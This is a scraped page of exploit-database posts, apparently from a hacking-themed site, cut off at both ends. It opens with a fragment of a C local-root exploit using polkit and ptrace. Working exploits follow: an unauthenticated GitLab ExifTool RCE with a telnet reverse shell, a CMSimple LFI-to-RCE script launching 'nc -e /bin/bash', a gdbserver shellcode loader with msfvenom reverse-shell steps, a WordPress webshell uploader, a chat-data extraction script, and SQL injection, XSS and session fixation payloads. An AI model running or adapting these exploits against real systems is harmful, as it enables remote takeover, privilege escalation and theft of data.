popen(cmd, "r"); if (fp == NULL) { dprintf("err: Failed to run %s.\n", cmd); exit(EXIT_FAILURE); } char line[1024]; char buffer[2048]; int helper_index = 0; int useful_action = 0; static const char *threadv = "org.freedesktop.policykit.exec.path -> "; int needle_length = strlen(threadv); while (fgets(line, sizeof(line)-1, fp) != NULL) { if (strstr(line, "implicit active:")) { if (strstr(line, "yes")) { useful_action = 1; } continue; } if (useful_action == 0) continue; useful_action = 0; int length = strlen(line); char* found = memmem(&line[0], length, threadv, needle_length); if (found == NULL) continue; memset(buffer, 0, sizeof(buffer)); for (int i = 0; found[needle_length + i] != '\n'; i++) { if (i >= sizeof(buffer)-1) continue; buffer[i] = found[needle_length + i]; } if (stat(&buffer[0], &st) != 0) continue; if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 || strstr(&buffer[0], "/cpugovctl") != 0 || strstr(&buffer[0], "/package-system-locked") != 0 || strstr(&buffer[0], "/cddistupgrader") != 0) { dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]); continue; } trunk[helper_index] = strndup(&buffer[0], strlen(buffer)); helper_index++; if (helper_index >= sizeof(trunk)/sizeof(trunk[0])) break; } pclose(fp); return 0; } int root_ptraceme() { dprintf("helper initiated: %s\n", path_doublealign); eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT)); eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000)); char overlayfs = 0; eff(write(trace_align[1], &overlayfs, 1)); dprintf("SUID process is being initiated(%s) ...\n", path_exec); static char stackv[1024*1024]; pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv), CLONE_VM|CLONE_VFORK|SIGCHLD, NULL)); if (!mid_succ) return 1; while (1) { int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY); char overlayfs[16]; int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1)); overlayfs[buflen] = '\0'; *strchrnul(overlayfs, '\n') = '\0'; if (strncmp(overlayfs, basename(path_doublealign), 15) == 0) break; usleep(100000); } dprintf("midpid is being traced...\n"); eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL)); eff(waitpid(midpid, &pipe_stat, 0)); dprintf("midpid attached.\n"); timeexecbuffer(midpid, 0, "stage2"); exit(EXIT_SUCCESS); } int main(int argc, char **inj_arse) { if (strcmp(inj_arse[0], "stage2") == 0) return stag_2(); if (strcmp(inj_arse[0], "stage3") == 0) return sh_spawn(); dprintf("Welcome to your Arsenal!\n"); check_env(); if (argc > 1 && strcmp(inj_arse[1], "check") == 0) { exit(0); } dprintf("efficient trunk is being searched...\n"); trunkh(); for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) { if (trunk[i] == NULL) break; if (stat(trunk[i], &st) == 0) { path_doublealign = trunk[i]; root_ptraceme(); } } dprintf("familiar trunks are been searched ...\n"); for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) { if (stat(trunks_rec[i], &st) == 0) { path_doublealign = trunks_rec[i]; dprintf("trunk helper found: %s\n", path_doublealign); root_ptraceme(); } } return 0; }
HireHackking

Bus Pass Management System 1.0 - 'Search' SQL injection

HACKER · %s · %s

# Exploit Title: Bus Pass Management System 1.0 - 'Search' SQL injection # Date: 23-11-2021 # Exploit Author: Abhijeet Singh # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/ # Version: v-1.0 (Default) # Tested on: macOS Monterey(Version 12.0.1) *SQL Injection:* SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. *Attack Vector:* An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap. *Steps to reproduce:* Step-1: Open 'View Pass' page using following URL: http://127.0.0.1/buspassms/download-pass.php 2. Now put the below payload in the 'Search' field. *Payload: *123' AND (SELECT 7169 FROM (SELECT(SLEEP(4)))abhi) AND 'x'='x 3. Server accepted our payload and the response got delayed by 4 seconds. *IMPACT:* As the vulnerable parameter is an external parameter (credentials not required), an attacker can dump the database of the application remotely. Suggested Mitigation/Remediation Actions Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas where the application or other applications in the organization are vulnerable to this attack. Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible security specific libraries should be used in order to provide an additional layer of protection.
HireHackking
# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated) # Date: 11/15/2021 # Exploit Author: S1lv3r # Vendor Homepage: https://www.cmsimple.org/en/ # Software Link: https://www.cmsimple.org/en/ # Version: CMSimple 5.4 # Tested on: CMSimple 5.4 # writeup: # https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities #!/usr/bin/python3 import requests import threading import datetime import sys from bs4 import BeautifulSoup x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) Time = x + addSeconds proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",} def Login(): try: global Time s = requests.Session() headers= {"Content-Type": "application/x-www-form-urlencoded"} data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login' response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies if response.cookies['passwd']: print("(+) Sucessfully Logged In With " + User + ":" + Password) cookies = response.cookies params = (('file', 'config'),('action', 'array'),) response = s.get(RHOST ,cookies=cookies ,params=params,verify=False) soup = BeautifulSoup(response.text, 'lxml') CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value'] print("(+) Get CSRF Token : [ " + CsrfValue + " ]") data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save' response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False) print("(+) Changing Functions file Done ") print("(+) Check Your nc listner on " + LPORT) except Exception as error: print("Error, Exiting;( ") print(error) pass def fuzz(): while True: try: sessionName = "S1lv3r" cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS':(None, '<?php passthru("nc '+ LHOST +' '+ LPORT + ' -e /bin/bash");?>'), 'file': ('Anything', 'S1lv3r'*100, 'application/octet-stream')} x = requests.post(RHOST, files=files, cookies=cookies, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) CMSimple LFI to RCE \n") Login() threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) <= 5: print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) SiLvEr \n") exit() else: RHOST = sys.argv[1] LHOST = sys.argv[2] LPORT = sys.argv[3] User = sys.argv[4] Password = sys.argv[5] main()
HireHackking

Bagisto 1.3.3 - Client-Side Template Injection

HACKER · %s · %s

# Exploit Title: Bagisto 1.3.3 - Client-Side Template Injection # Date: 11-25-2021 # Exploit Author: Mohamed Abdellatif Jaber # Vendor Homepage: https://bagisto.com/en/ # Software Link: https://github.com/bagisto/bagisto # Version: v1.3.3 # Tested on: [windows | chrome | firefox ] Exploit :. 1- register an account and login your account 2- go to your profile and edit name , address 2- and put this payload {{constructor.constructor('alert(document.domain)')()}} 3- admin or any one view order or your profile will execute arbitrary JS-code . rf:https://portswigger.net/kb/issues/00200308_client-side-template-injection
HireHackking

orangescrum 1.8.0 - Privilege escalation (Authenticated)

HACKER · %s · %s

# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Privilege escalation # The user must be assigned to the project with the account he wants to take over # The vulnerabilities in the application allow for: * Taking over any account with which the project is assigned ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1. Go to the dashboard 2. Go to the page source view 3. Find in source "var PUSERS" 4. Copy "uniq_id" victim 5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source 6. After refreshing the page, you are logged in to the victim's account
HireHackking

opencart 3.0.3.8 - Sessjion Injection

HACKER · %s · %s

# Exploit Title: opencart 3.0.3.8 - Sessjion Injection # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/ # Version: 3.0.3.8 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Sessjion Fixation / injection Session cookie "OCSESSID" is inproperly processed Attacker can set any value cookie and server set this value Becouse of that sesssion injection and session fixation vulnerability ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example Modify cookie "OCSESSID" value: ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/opencart-3.0.3.8/ Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Server set atttacker value: Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 15:16:06 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: PHP/8.0.11 Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18944 [...]
HireHackking
# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated) # Date: 21/04/2021 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip # Version: 6.7 # Tested on: Windows 8.1, Kali Linux, Burp Suite Steps to Reproduce: 1. At first login to your panel 2. then click the "Sliders" menu to "New Slider" 3. now intercept with the burp suite and save a new slider 4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value. 5. Now Generate a CSRF POC <!DOCTYPE html> <html> <body> <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST"> <input type="hidden" name="iSlider" value=""> <input type="hidden" name="aFile" filename=""> <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg"> <input type="hidden" name="sDescription" value="test</textarea><script>alert(document.cookie)</script>"> <input type="hidden" name="iPosition" value="1"> <input type="hidden" name="sOption" value="save"> <input type="submit" value="submit"> </form> </body> </html>
HireHackking

GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)

HACKER · %s · %s

# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) # Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22 # Date: 11/01/2021 # Exploit Author: Jacob Baines # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://gitlab.com/gitlab-org/gitlab # Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8 # Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu) # CVE : CVE-2021-22205 # Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/ # Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it. 1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270. echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=" | base64 -d > lol.jpg echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg echo -n "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==" | base64 -d >> lol.jpg 2. Sending the payload. Any random endpoint will do. curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8) 2a. Sample Output from the reverse shell: $ nc -lnvp 1270 Listening on [0.0.0.0] (family 0, port 1270) Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836) whoami git id uid=998(git) gid=998(git) groups=998(git)
HireHackking
# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload # Google Dork: inurl: /wp-content/plugins/smart-product-review/ # Date: 16/11/2021 # Exploit Author: Keyvan Hardani # Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/ # Version: <= 1.0.4 # Tested on: Kali Linux import os.path from os import path import json import requests; import time import sys def banner(): animation = "|/-\\" for i in range(20): time.sleep(0.1) sys.stdout.write("\r" + animation[i % len(animation)]) sys.stdout.flush() #do something print("Smart Product Review 1.0.4 - Arbitrary File Upload") print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)") def usage(): print("Usage: python3 exploit.py [target url] [your shell]") print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("No script kiddies please!!" in raw): return False; else: return True; def main(): banner() if(len(sys.argv) != 3): usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'sprw_file_upload_action' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'files[]' : open(file_path)} data = { "allowedExtensions[0]" : "jpg", "allowedExtensions[1]" : "php4", "allowedExtensions[2]" : "phtml", "allowedExtensions[3]" : "png", "qqfile" : "files", "element_id" : "6837", "sizeLimit" : "12000000", "file_uploader_nonce" : "2b102311b7" } print("Uploading Shell..."); response = requests.post(uri, files=files, data=data ) file_name = path.basename(file_path) if("ok" in response.text): print("Shell Uploaded!") print("Shell URL on your Review/Comment"); else: print("Shell Upload Failed") sys.exit(1) main();
HireHackking

GNU gdbserver 9.2 - Remote Command Execution (RCE)

HACKER · %s · %s

# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE) # Date: 2021-11-21 # Exploit Author: Roberto Gesteira Miñarro (7Rocky) # Vendor Homepage: https://www.gnu.org/software/gdb/ # Software Link: https://www.gnu.org/software/gdb/download/ # Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2 # Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries) #!/usr/bin/env python3 import binascii import socket import struct import sys help = f''' Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode> Example: - Victim's gdbserver -> 10.10.10.200:1337 - Attacker's listener -> 10.10.10.100:4444 1. Generate shellcode with msfvenom: $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin 2. Listen with Netcat: $ nc -nlvp 4444 3. Run the exploit: $ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin ''' def checksum(s: str) -> str: res = sum(map(ord, s)) % 256 return f'{res:2x}' def ack(sock): sock.send(b'+') def send(sock, s: str) -> str: sock.send(f'${s}#{checksum(s)}'.encode()) res = sock.recv(1024) ack(sock) return res.decode() def exploit(sock, payload: str): send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;') send(sock, '!') try: res = send(sock, 'vCont;s') data = res.split(';')[2] arch, pc = data.split(':') except Exception: print('[!] ERROR: Unexpected response. Try again later') exit(1) if arch == '10': print('[+] Found x64 arch') pc = binascii.unhexlify(pc[:pc.index('0*')]) pc += b'\0' * (8 - len(pc)) addr = hex(struct.unpack('<Q', pc)[0])[2:] addr = '0' * (16 - len(addr)) + addr elif arch == '08': print('[+] Found x86 arch') pc = binascii.unhexlify(pc) pc += b'\0' * (4 - len(pc)) addr = hex(struct.unpack('<I', pc)[0])[2:] addr = '0' * (8 - len(addr)) + addr hex_length = hex(len(payload))[2:] print('[+] Sending payload') send(sock, f'M{addr},{hex_length}:{payload}') send(sock, 'vCont;c') def main(): if len(sys.argv) < 3: print(help) exit(1) ip, port = sys.argv[1].split(':') file = sys.argv[2] try: with open(file, 'rb') as f: payload = f.read().hex() except FileNotFoundError: print(f'[!] ERROR: File {file} not found') exit(1) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((ip, int(port))) print('[+] Connected to target. Preparing exploit') exploit(sock, payload) print('[*] Pwned!! Check your listener') if __name__ == '__main__': main()
HireHackking
# Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure # Exploit Author: Keyvan Hardani # Date: 22/11/2021 # Vendor Homepage: https://wp-guppy.com/ # Version: up to 1.1 # Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2 # Usage ./exploit.sh -h #!/bin/bash Help() { # Display Help echo "Usage" echo echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure" echo echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)" echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507" echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493" echo "-h Print this Help." echo } while getopts ":h" option; do case $option in h) # display Help Help exit;; esac done if [ $1 == 1 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool fi if [ $1 == 2 ] then curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool fi if [ $1 == 3 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool fi
HireHackking

FLEX 1085 Web 1.6.0 - HTML Injection

HACKER · %s · %s

# Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection # Date: 2021-11-21 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android Title: ================ FLEX 1085 Web - HTML Injection Summary: ================ The FLEX 1085 Web appliance is vulnerable to an HTML injection attack that allows the injection of arbitrary HTML code. Severity Level: ================ 5.3 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Vulnerability Disclosure Schedule: ============================ * October 19, 2021: An email was sent to support at 6:08MP. * November 20, 2021: I didn't get any response from support. * November 21, 2021: Vulnerability Disclosure Affected Product: ================ FLEX 1085 Web v1.6.0 Steps to Reproduce: ================ 1. Open your browser and search for your device's IP address (http://<IP>). 2. Log in to the device's dashboard and go to "WiFi". 3. Use another device that has an access point and create a Wi-Fi network called "<h1>HTML Injection</h1>" (no double quotes) and activate the access point. (https://prnt.sc/20e4y88) 4. Go back to the FLEX device and when scanning the new WiFi networks, the new network will appear written "HTML Injection" in bold and with a larger font size. (http://prnt.sc/20e51li)
HireHackking

Webrun 3.6.0.42 - 'P_0' SQL Injection

HACKER · %s · %s

# Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection # Google Dork: intitle:"Webrun 3.6.0.42" # Date: 23/11/2021 # Exploit Author: Vinicius Alves # Vendor Homepage: https://softwell.com.br/ # Version: 3.6.0.42 # Tested on: Kali Linux 2021.3 # CVE: CVE-2021-43650 =-=-=-= Description =-=-=-= Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0 parameter used to set the username during the login process. =-=-=-= Exploiting =-=-=-= In the post request, change the P_0 value to the following payload: 121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd You will see some information like below: interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric: \"qvvxq1qbzbq\"', null, null, null, '<b> =-=-=-= POC =-=-=-= If the return has the value 'qvvxq1qbzbq', you will be able to successfully exploit this. See an example of the complete POST parameter: action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd
HireHackking

HTTPDebuggerPro 9.11 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path # Exploit Author: Aryan Chehreghani # Date: 23/11/2021 # Vendor Homepage: https://www.httpdebugger.com # Software Link: https://www.httpdebugger.com/download.html # Version: 9.11 # Tested on: Windows 10 x64 SERVICE_NAME: HTTPDebuggerPro TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HTTP Debugger Pro DEPENDENCIES : SERVICE_START_NAME : LocalSystem
HireHackking

orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)

HACKER · %s · %s

# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated) # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### SQL Injection # Authenticated user ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example vuln parameters: * project_id * old_project_id * uuid * uniqid * projid * id * caseno ----------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- ## Example ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1' - error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 64 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 500 Internal Server Error Date: Sun, 28 Nov 2021 12:42:30 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: 